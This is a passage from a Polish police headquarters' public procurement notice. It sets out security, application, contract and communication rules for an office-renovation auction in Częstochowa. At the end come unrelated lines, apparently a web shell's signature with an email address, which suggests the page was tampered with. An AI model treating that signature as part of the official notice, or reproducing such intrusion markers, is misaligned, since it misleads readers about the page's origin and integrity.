poręczeniach bankowych, poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że
poręczenie kasy jest zawsze poręczeniem pieniężnym, gwarancjach bankowych, gwarancjach
ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt.
2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości. 2.
Zamawiający nie wyraża zgody na wniesienie zabezpieczenia: - w wekslach z poręczeniem
wekslowym banku lub spółdzielczej kasy oszczędnościowo-kredytowej, - przez ustanowienie
zastawu na papierach wartościowych emitowanych przez Skarb Państwa lub jednostkę samorządu
terytorialnego, - przez ustanowienie zastawu rejestrowego na zasadach określonych w przepisach o
zastawie rejestrowym i rejestrze zastawów. 3. Zamawiającego nie wyraża zgody na tworzenie
zabezpieczenia należytego wykonania umowy przez potrącenia z należności za częściowo
wykonane roboty budowlane. 4. Zabezpieczenie wnoszone w pieniądzu Wykonawca wpłaca
przelewem na rachunek bankowy wskazany przez Zamawiającego w załączniku nr 2 do ogłoszenia
- projekcie umowy 5. W zawiązku z zabezpieczeniem wnoszonym w innej formie niż pieniężnej
Zamawiający informuje, że § 11 Regulaminu Narodowego Banku Polskiego tj. banku, który
prowadzi obsługę bankową Zamawiającego, NBP nie poświadcza kart wzorów podpisów oraz
innych dokumentów posiadacza rachunku w związku z dokonywaniem przez niego innych
czynności poza NBP. Tym samym taki zapis w przedkładanym jako zabezpieczenie dokumencie nie
będzie dopuszczany przez Zamawiającego</p>
<p><b>IV.4.15 Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego </b><i>(dotyczy licytacji elektronicznej):</i></p>
<p>Szczegółowe warunki umowy zawarte są w załączonym projekcie umowy w załączniku nr 2 do ogłoszenia dostępnym na stronie www.bip.katowice.kwp.policja.gov.pl</p>
<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> CENA: Wykonawca, który wygra licytację, przed zawarciem umowy
wypełni Formularz ofertowy - załącznik nr 7 do ogłoszenia dostępny na stronie
www.bip.katowice.kwp.policja.gov.pl oraz opracuje szczegółowy kosztorys ofertowy na podstawie
załączników nr 3 i nr 4 do ogłoszenia dostępnych na stronie www.bip.katowice.kwp.policja.gov.pl.
Przygotowany szczegółowy kosztorys ofertowy będzie stanowił załącznik do Formularza
ofertowego. Cena ofertowa wskazana w Formularzu ofertowym będzie musiała zostać wyliczona na
podstawie szczegółowego kosztorysu ofertowego. PRZEKAZANIE WNIOSKU O
DOPUSZCZENIE DO UDZIAŁU W LICYTACJI: 1.Wniosek ma być złożony w zamkniętej,
zabezpieczonej kopercie (kopertach) nie jest dopuszczalne złożenie wniosku w formie elektroniczne
- za sposób zabezpieczenia kopert/y odpowiada Wykonawca. 2. Koperta ma być zaadresowana na
Zamawiającego i oznaczona: ZP-2380-375-81/2013 Wniosek o dopuszczenie do udziału w licytacji
elektronicznej na Remont pomieszczeń w budynku biurowym III Komisariatu Policji w Częstochowie ul. Kiedrzyńska 98. Adres Zamawiającego:
Komenda Wojewódzka Policji w Katowicach Zespół Zamówień Publicznych 40-038 Katowice ul.
J. Lompy 19 blok C piętro VII pokój 735 Nie otwierać przed komisyjnym otwarciem wniosków 3.
Ponadto koperta winna spełniać warunek uniemożliwiający odczytanie jej zawartości i oznaczona
nazwą (firmą) i adresem Wykonawcy z uwagi na pkt. 4 4. Wnioski złożone po terminie nie będą
rozpatrywane. Wszystkie wnioski otrzymane po terminie składania zostaną zwrócone
Wykonawcom po upływie ostatecznego terminu składania wniosków. OPIS SPOSOBU
PRZYGOTOWANIA WNIOSKÓW: 1. Wykonawca składa: wypełniony wniosek o dopuszczenie
do udziału w postępowaniu wg. wzoru załącznika nr 1 do ogłoszenia oraz dokumenty i załączniki
wskazane w Sekcji III.6 ogłoszenia 2. Wniosek o dopuszczenie do udziału w postępowaniu oraz
wszystkie załączniki w tym dokumenty i oświadczenia, mają być w całości sporządzone w języku
polskim, ręcznie, na maszynie do pisania lub komputerze (w sposób czytelny) oraz podpisany w
sposób określony pkt. 3 przez osoby uprawnione (podpisujące wniosek). Osoba uprawniona to
osoba, która jest wymieniona w aktualnym odpisie z właściwego rejestru lub działająca z jej
upoważnienia. 3. Wszystkie dokumenty w złożonym wniosku muszą być opieczętowane pieczątką
imienną i podpisane lub podpisane czytelnie przez osoby uprawnione i opieczętowane pieczęciami
firmowymi lub sporządzone na papierze firmowym i podpisane czytelnie przez osoby uprawnione.
Nie dotyczy załączników składanych jako oryginały wystawione i podpisane przez uprawnione
organy np. KRS. Dokumenty wielostronicowe mogą być opieczętowane pieczątką imienną i
podpisane lub podpisane czytelnie przez osoby uprawnione i opieczętowane pieczęciami
firmowymi lub sporządzone na papierze firmowym i podpisane czytelnie przez osoby uprawnione
na pierwszej lub ostatniej jego stronie. Dokumenty mogą być składane w formie oryginału lub
kserokopii poświadczonej przez Wykonawcę za zgodność z oryginałem. W przypadku składania
dokumentów wydanych w języku innym niż język polski, dokumenty te są składane wraz z
tłumaczeniem na język polski, poświadczonym przez Wykonawcę. Uwaga: Przez podpis czytelny
Zamawiający rozumie podpis odręczny, zawierający imię i nazwisko pozwalający na identyfikację
osoby, która go złożyła. 4. W przypadku podpisywania wniosku przez osobę nie wymienioną w
aktualnym odpisie z właściwego rejestru,niezbędne jest we wniosku pełnomocnictwo dla osoby
działającej w imieniu Wykonawcy w formie oryginału lub jego poświadczonej notarialnie kopii.
Pełnomocnictwo w sposób jednoznaczny ma określać, do jakich czynności upoważniona jest osoba
podpisująca wniosek o dopuszczenie do udziału w postępowaniu. 5. W przypadku Wykonawców
ubiegających się wspólnie (konsorcjum) o udzielenie zamówienia publicznego na podstawie art. 23
ust. 2 ustawy PZP wynika obowiązek ustanowienia pełnomocnika do reprezentowania ich w
prowadzonym postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy. W
związku z powyższym niezbędne jest przedłożenie w wniosku pełnomocnictwa w formie oryginału
lub jego poświadczonej notarialnie kopii w celu ustalenia podmiotu uprawnionego do
występowania w imieniu grupy Wykonawców w sposób umożliwiający identyfikację Wykonawców
ubiegających się wspólnie o udzielenie zamówienia. Uwaga: W przypadku spółki cywilnej,
wspólnicy nie przedstawiają osobnego dokumentu zawierającego pełnomocnictwo, jednakże
uprawnienia do reprezentacji spółki przysługujące każdemu ze wspólników ma wynikać z samej
umowy spółki cywilnej dołączonej do wniosku. 6. Wszelkie miejsca, w których Wykonawca
naniósł poprawki, zmiany muszą być parafowane przez osobę podpisującą wniosek (osobę
uprawnioną). 7. Wszelkie dokumenty składane na papierze światłoczułym uznane zostaną za
nieważne. 8. Wnioski o dopuszczenie do udziału w postępowaniu są jawne od dnia poinformowania
o wynikach oceny spełniania warunków udziału w postępowaniu art. 96 ust 3. Nie ujawnia się
informacji umożliwiających identyfikację Wykonawcy podczas licytacji (login) aż do momentu jej
zamknięcia oraz informacji stanowiących tajemnicę przedsiębiorstwa w rozumieniu przepisów o
zwalczaniu nieuczciwej konkurencji, jeżeli Wykonawca, nie później niż w terminie składania
wniosku zastrzegł, że nie mogą być one udostępniane. 9. Jeżeli Wykonawca chce zastrzec strony
ww. wniosku wówczas składa je w dodatkowej zabezpieczonej kopercie, z opisem INFORMACJE
STANOWIĄCE TAJEMNICĘ PRZEDSIĘBIORSTWA. 10. Podmiot prowadzący działalność
gospodarczą jako osoba fizyczna, osoba prawna albo jednostka organizacyjna nie posiadająca
osobowości prawnej, może złożyć tylko jeden wniosek o dopuszczenie do udziału w postępowaniu,
sam lub jako Partner Konsorcjum firm. 11. W przypadku złożenia przez jednego Wykonawcę
dwóch lub więcej wniosków o dopuszczenie do udziału w postępowaniu Zamawiający uzna
złożenie wniosku za ważne i dopuści Wykonawcę do udziału w postępowaniu na podstawie
wszystkich złożonych wniosków. ISTOTNE DLA STRON POSTANOWIENIA, KTÓRE
ZOSTANĄ WPROWADZONE DO TREŚCI ZAWIERANEJ UMOWY W SPRAWIE
ZAMÓWIENIA PUBLICZNEGO Szczegółowe warunki umowy zawarte są w załączonym
projekcie umowy w załączniku nr 2 do ogłoszenia dostępnym na stronie
www.bip.katowice.kwp.policja.gov.pl INFORMACJA O FORMALNOŚCIACH, JAKIE
POWINNY ZOSTAĆ DOPEŁNIONE PO PRZEPROWADZENIU LICYTACJI W CELU
ZAWARCIA UMOWY W SPRAWIE ZAMÓWIENIA PUBLICZNEGO. 1. Przed podpisaniem
umowy Wykonawca dostarcza Zamawiającemu wypełniony formularz ofertowy stanowiący
załącznik nr 7 do ogłoszenia dostępny na stronie www.bip.katowice.kwp.policja.gov.pl oraz
szczegółowy kosztorys ofertowy opracowany na podstawie załącznika nr 4 do ogłoszenia
dostępnego na stronie www.bip.katowice.kwp.policja.gov.pl. 2. Błędne wypełnienie formularza
ofertowego lub szczegółowego kosztorysu ofertowego, w tym niezgodność z załącznikiem nr 4 do
ogłoszenia - przedmiar robót , będzie skutkowało wezwaniem Wykonawcy do przedłożenia
prawidłowego formularza ofertowego lub szczegółowego kosztorysu ofertowego, a w przypadku
odmowy jego poprawienia Zamawiający uzna, iż Wykonawca uchyla się od zawarcia umowy w
sprawie zamówienia publicznego i będzie miał zastosowanie art 94 ust. 3 ustawy Prawo Zamówień
Publicznych. 3. Umowa zawarta z Wykonawcą będzie realizowana w oparciu o ceny i składniki
cenotwórcze podane w szczegółowym kosztorysie ofertowym 4. W przypadku wygrania licytacji
przez Wykonawcę będącego spółką z ograniczoną odpowiedzialnością, którego wartość oferty
przewyższa dwukrotnie wysokość kapitału zakładowego Wykonawca zobowiązany jest najpóźniej
w dniu podpisania umowy do przedłożenia uchwały wspólników lub odpisu umowy spółki
wyrażającej zgodę na zaciągnięcie zobowiązania (art. 230 Kodeksu Spółek Handlowych).
Powyższe dotyczy również Wykonawców ubiegających się wspólnie o udzielenie zamówienia
publicznego. 6. W przypadku wygrania licytacji przez Wykonawców ubiegających się wspólnie o
udzielenie zamówienia publicznego przed podpisaniem umowy konieczne jest przedłożenie umowy
konsorcjum, która będzie regulować wzajemną współpracę Wykonawców czyli zawierać
postanowienia dotyczące m.in. realizacji poszczególnych części zamówienia, sposobu dokonywania
rozliczeń. Zgodnie z treścią art. 141 ustawy PZP Wykonawcy ubiegający się wspólnie o udzielenie
zamówienia ponoszą solidarną odpowiedzialność za wykonanie umowy. Zasady solidarnej
odpowiedzialności zostały uregulowane art. 366 § 1 Kodeksu cywilnego. Umowa regulująca
współpracę podmiotów występujących wspólnie (konsorcjum) ma m.in.: - upoważniać jednego z
członków konsorcjum - Głównego Partnera - jako osobę prawną i reprezentującą go wskazaną
osobę fizyczną, do występowania w imieniu każdego z pozostałych Partnerów we wszystkich
sprawach związanych z umową; - stwierdzać, że Partnerzy będą odpowiedzialni solidarnie za całość
podjętych zobowiązań w ramach realizacji zamówienia; - być zawarta na czas trwania umowy, aż
do ostatecznego wygaśnięcia obowiązków i praw wobec zamawiającego; - być zawarta w formie
pisemnej - określać zakres rzeczowo-finansowy każdego z członków konsorcjum 7. Wykonawca
jest zobligowany najpóźniej w dniu zawarcia umowy przekazać Zamawiającemu informację
dotyczącą imienia i nazwiska osób oraz nr uprawnienia, które będą pełniły funkcje wskazane w § 2
ust. 7 projektu umowy. INFORMACJE O SPOSOBIE POROZUMIEWANIA SIĘ
ZAMAWIAJĄCEGO Z WYKONAWCAMI WRAZ ZE WSKAZANIEM PRZEZ
ZAMAWIAJĄCEGO OSÓB UPRAWNIONYCH DO POROZUMIEWANIA SIĘ Z
WYKONAWCAMI: 1. Wszelkie oświadczenia, zawiadomienia oraz informacje Zamawiający i
Wykonawcy przekazują pisemnie do momentu otwarcia licytacji. Oświadczenia, zawiadomienia
oraz informacje przekazane za pomocą faxu lub drogą elektroniczną uważa się za złożone w
terminie, jeżeli ich treść dotarła do adresata przed upływem terminu i została niezwłocznie
potwierdzona na piśmie (doręczone pocztą lub osobiście) na adres: Komenda Wojewódzka Policji
w Katowicach Zespół Zamówień Publicznych 40-038 Katowice ul. J. Lompy 19. (art. 27 ustawy
Prawo Zamówień Publicznych). 2. Wykonawcy zobowiązani są do wskazania we wniosku o
dopuszczenie do udziału w postępowaniu stanowiącym załącznik nr 1 do ogłoszenia numeru
telefonu oraz numeru faksu lub adresu poczty elektronicznej, na który Zamawiający będzie
przesyłał Wykonawcy wszelkie pisma przekazywane w ramach postępowania. Wykonawca wybiera
faks albo pocztę elektroniczną według własnego uznania. W przypadku wpisania przez Wykonawcę
zarówno numeru faksu jak i adresu poczty elektronicznej Zamawiający będzie przesyłał
zeskanowane dokumenty pocztą elektroniczną. W przypadku wyboru przez Wykonawcę poczty
elektronicznej Wykonawca ponosi pełną odpowiedzialność za odbieranie przekazywanej poczty. W
przypadku zaniechania odebrania przekazanej poczty Wykonawca ponosi wszelkie wynikające z
tego skutki. Zamawiający nie wymaga potwierdzenia otrzymania przekazywanego pisma drogą
elektroniczną. W przypadku wyboru przez Wykonawcę jako drogi otrzymywania pism nadawanych
przez Zamawiającego drogą faksową Wykonawca ponosi odpowiedzialność za sprawdzenie
kompletności i czytelności otrzymania przesłanego pisma. Brak kompletności lub czytelności
Wykonawca niezwłocznie zgłasza Zamawiającemu telefonicznie na nr 32 200-20-50. Za dowód
skutecznego przesłania pisma do Wykonawcy drogą faksową Zamawiający uznaje potwierdzenie
przesłania faksowego OK na numer podany przez Wykonawcę na formularzu ofertowym i
wykazany na potwierdzeniu faksowym. Zamawiający nie wymaga potwierdzenia otrzymania
przekazywanego pisma drogą faksową. Wykonawca zobowiązany jest do powiadomienia
Zamawiającego w przypadku zmiany numeru telefonu, faksu lub adresu poczty elektronicznej, na
który Zamawiający ma przesyłać pisma. W przypadku nie dokonania powiadomienia
Zamawiającego, przesłanie pisma na numer faksu lub adres poczty elektronicznej wskazany na
wniosku zgodnie z zasadami wskazanymi w niniejszym punkcie uważa się za skutecznie
dokonane.Zaproszenia do udziału w licytacji zostaną przekazane faxem i potwierdzone pocztą. 3.
Przesyłanie wszelkich informacji, oświadczeń, zaświadczeń drogą faksową i elektroniczną może
odbywać się tylko w dniach urzędowania Komendy (od poniedziałku do piątku w godzinach 7.30-
15.30) na numer 032 200 20 60 lub e-mail: zamowienia@ka.policja.gov.pl. UWAGA: W przypadku
przesłania dokumentu po godzinie 15.30 w dniu roboczym spowoduje, iż zostanie on
zarejestrowany u Zamawiającego jako złożony w następnym dniu roboczym. W przypadku
przesłania dokumentu w dniu wolnym od pracy zostanie on zarejestrowany u Zamawiającego jako
złożony w pierwszym następującym dniu roboczym. fax. 032 2002060, e mail:
zamowienia@ka.policja.gov.pl 5. Od momentu otwarcia do momentu zamknięcia licytacji
Zamawiający i Wykonawcy wszelkiego rodzaju wnioski,oświadczenia i inne informacje przekazują
drogą elektroniczną za pośrednictwem platformy licytacyjnej; wiadomości przekazywane
Wykonawcom będą widoczne w zakładce moje wiadomości POUCZENIE O ŚRODKACH
OCHRONY PRAWNEJ PRZYSŁUGUJĄCYCH WYKONAWCY W TOKU POSTĘPOWANIA O
UDZIELENIE ZAMÓWIENIA. Wykonawcy w toku postępowania o udzielenie zamówienia
przysługują środki ochrony prawnej określone w dziale VI ustawy Prawo Zamówień Publicznych.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com